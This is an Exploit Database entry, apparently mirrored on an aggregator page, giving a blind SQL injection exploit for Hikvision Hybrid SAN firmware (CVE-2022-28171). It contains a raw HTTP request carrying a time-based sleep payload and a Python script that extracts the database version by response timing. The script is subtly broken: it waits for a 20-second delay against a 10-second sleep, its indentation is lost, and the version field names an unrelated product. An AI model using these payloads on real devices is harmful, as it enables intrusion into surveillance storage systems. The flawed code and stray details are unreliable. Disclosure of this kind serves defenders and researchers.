Hikvision Hybrid SAN Ds-a71024 Firmware – Multiple Remote Code Execution

• Exploit Database
• 20 阅读

• 作者： Thurein Soe
  日期： 2023-07-19
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51607/

• # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
  # Date: 16July 2023
  # Exploit Author: Thurein Soe
  # CVE : CVE-2022-28171
  # Vendor Homepage: https://www.hikvision.com
  # Software Link: N/A
  # Refence Link: https://cve.report/CVE-2022-28171
  # Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s
  '''
  Vendor Description:
  
  Hikvision is a world-leading surveillance manufacturer and supplier of
  video surveillance and Internet of Things (IoT) equipment for civilian and
  military purposes.
  Some Hikvision Hybrid SAN products were vulnerable to multiple remote code
  execution vulnerabilities such as command injection, Blind SQL injection,
  HTTP request smuggling, and reflected cross-site scripting.
  This resulted in remote code execution that allows an adversary to execute
  arbitrary operating system commands and more. However, an adversary must be
  on the same network to leverage this vulnerability to execute arbitrary
  commands.
  
  Vulnerability description:
  A manual test confirmed that The download type parameter was vulnerable to
  Blind SQL injection.I created a Python script to automate and enumerate SQL
  versions as the Application was behind the firewall and block all the
  requests from SQLmap.
  
  Request Body:
  GET
  /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'
  HTTP/1.1
  Host: X.X.X.X.12:2004
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
  Connection: close
  
  POC:
  '''
  import requests
  import time
  
  url = "http://X.X.X.X:2004/web/log/dynamic_log.php"
  
  # Function to check if the response time is greater than the specified delay
  def is_response_time_delayed(response_time, delay):
  return response_time >= delay
  
  # Function to perform blind SQL injection and check the response time
  def perform_blind_sql_injection(payload):
  proxies = {
  'http': 'http://localhost:8080',
  'https': 'http://localhost:8080',
  }
  
  params = {
  'target': 'makeMaintainLog',
  'downloadtype': payload
  }
  headers = {
  'Accept-Encoding': 'gzip, deflate',
  'Accept': '*/*',
  'Accept-Language': 'en',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
  'Connection': 'close'
  }
  
  start_time = time.time()
  response = requests.get(url, headers=headers, params=params,
  proxies=proxies)
  end_time = time.time()
  
  response_time = end_time - start_time
  return is_response_time_delayed(response_time, 20)
  
  # Enumerate the MySQL version
  def enumerate_mysql_version():
  version_Name = ''
  sleep_time = 10# Sleep time is 10 seconds
  
  payloads = [
  f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},
  SLEEP({sleep_time}), 0))-- -"
  for i in range(1, 11)
  for mid in range(256)
  ]
  
  for payload in payloads:
  if perform_blind_sql_injection(payload):
  mid = payload.split("=")[-1].split(",")[0]
  version_Name += chr(int(mid))
  
  return version_Name
  
  # Enumeration is completed
  version_Name = enumerate_mysql_version()
  print("MySQL version is:", version_Name)